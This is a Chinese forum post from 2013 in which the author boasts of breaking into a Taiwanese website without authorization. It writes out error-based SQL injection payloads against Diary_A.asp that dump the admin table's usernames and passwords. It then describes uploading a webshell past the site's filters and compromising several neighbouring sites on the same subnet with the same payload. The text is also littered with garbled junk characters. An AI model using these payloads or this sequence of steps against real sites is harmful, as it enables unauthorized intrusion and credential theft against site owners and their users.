发现一个注入点+ J. o* h6 ?" J) A1 f5 Y5 Z$ Z1 @
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
0 o) w6 p! ^* I: \8 u* H+ h6 X! H* R0 L
# G( { V6 G& J7 s( U习惯性的加’having1=1--
! }. F. D0 A, a" P
1 g6 P8 Z9 v/ v" W2 P1 A& H) ~, xhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
4 o+ H$ f# w4 f% b8 z \2 D3 m& M; k" ^
0( x. j* Y4 S0 N' E6 G) P4 m
" W' f9 q1 m+ O0 p; `8 B爆出Diary_A.dl_Title(这时候很激动啊)
( c- U( W8 c: i0 t
! K4 v$ O7 B7 e那么继续
, P0 N; L/ a$ R; [http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—) V% x; A8 n* m
7 ~5 @) R5 d0 q
继续,一直爆下去
$ K% V" s# d! M& l6 M7 ^% ~
0 F$ V: F7 V8 {1 A爆到几个字段和表段 但是没找到需要的管理用户的字段
1 ?, N0 S5 I9 p+ K
$ ]/ r0 H/ p; F3 F' V蛋疼了 怎么办 然后去后台登陆页看源码$ \+ b3 R! t4 Z! a: v+ C
, T1 W! F. M- J- R; c
0
2 R; v# e' o* v- n
/ b' Q! W; k4 b$ yInput name= “ADUID”
x& c" W$ ]; B0 y9 CInput name= “ADPWD”
! P3 r- h2 A( X* b9 f v2 { J F* ^* D/ ^
很幸运 找到了字段那就继续
0 [9 h. @! O9 u9 m8 y. i, e3 H# X" Q找到之后开始爆用户4 x7 {0 c% g' H* `8 D" T5 P! v
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
. h2 g& ^4 W" M" e( T+ y爆密码
g0 p, H% K; u5 t0 ?$ N0 qhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—0 S7 e9 s4 D8 l. ~) }
测试了下 这个注入点只能爆到文章哪里的表 % K- m; n, O* q: q# F5 x. Y) M! q9 ~
# Y2 q: W0 W$ P$ ^- J& q头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了" w4 u6 O( ?) M' m
& k+ d. r( t# P. E6 g% \9 d
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了0 [8 O0 y" P4 j) J+ Y' u
, z, i! \8 @( o) F7 o: J
473: z; `( {) r: [) d' b
9 X' D9 V3 E7 Y8 w6 y7 ^进后台
" z! K- u) U; K, p: h3 t( t( J/ }6 y" p' \0 U
6 b: x( K* R' O% Y) B2 B4 l
发现几个上传点 有的地方不能上传 而且防止恶意代码
( R4 c% ~: o6 M% s* H8 Z7 F0 W6 p& T3 p
没办法 各种百度各种找大牛 找到一只好像可以突破的马- u7 V- R% v& `3 D! ?, w
1 C1 [1 s4 E; y" E0 X7 z/ ?
) \1 _- V3 ?, h [在系统管理那里直接上传 不过没有显示地址
4 T6 q0 u O2 }; F& m, J& Z
V- c) N7 H- [8 D8 W1 h) i( x再上传一次 抓包 搞定OK' J m4 Z4 u& M
. \* h( h3 z' s
! H2 \/ Q; P& |4 T# H# b; Y# o% l8 G. J& V7 l. {% |( f
472
9 v# B7 ]4 ]7 {4 c1 ]5 \- p: f# R4 ^3 ?# v/ _# s* o$ N8 O& v% P
晚上不行了 去睡觉。。。& w6 T5 x) Z0 j( L
第二天刚起床 闲的没事做继续日站吧 / L$ t+ P3 l8 G% w f5 K' M, x
; j7 j' d0 u; m- a. C Y: e找个站 就把这个站的旁c扫了下0 L6 ]# N* V8 O" L u( `
3 s% h, f; j# P* l) L+ X+ i, m
发现c段也有一个购物站 ,然后还和这个站的模板差不多- v E, ]+ }, Q# w4 u! `: t
3 ^! T& p. L; N; q9 L* W4 ^: R& v就找到会员登录口测试7 ^( s! m5 l( w
C# |5 I' ~: s
'and (select top 1 MGR_UID from A_MGR)>0—: z5 b2 l) \7 k, n8 N: A- |8 A
果断爆到了 这时候我很激动 通杀& i+ l! h. I, f; V. y, c# e' ^
: e, b9 ?$ b. c( R2 F再次翻c段
, x7 `* N( b8 Q9 x. z# @; Q( ~
6 p, w8 ]; S: E4 R& ?# r! ~ V1 k翻出几个站 都成功拿下, K$ d% ?* G$ I4 S1 P1 S- G9 N, Q
! N- U& p& w- M# W
9 B1 x5 k! R9 Y: a9 h: |3 r$ S: K* w0 Z |$ H# R" ^, r
修复方案:
: D! {$ L% S5 f- t他们比我专业
; I$ B" m; I. B9 U. z$ P6 K! k; I) c( t
| f4 C! g T+ E0 D: ^% E
" x$ I2 y! _, e8 c$ M
|
发表于 2013-4-4 17:40:38
收藏
支持
反对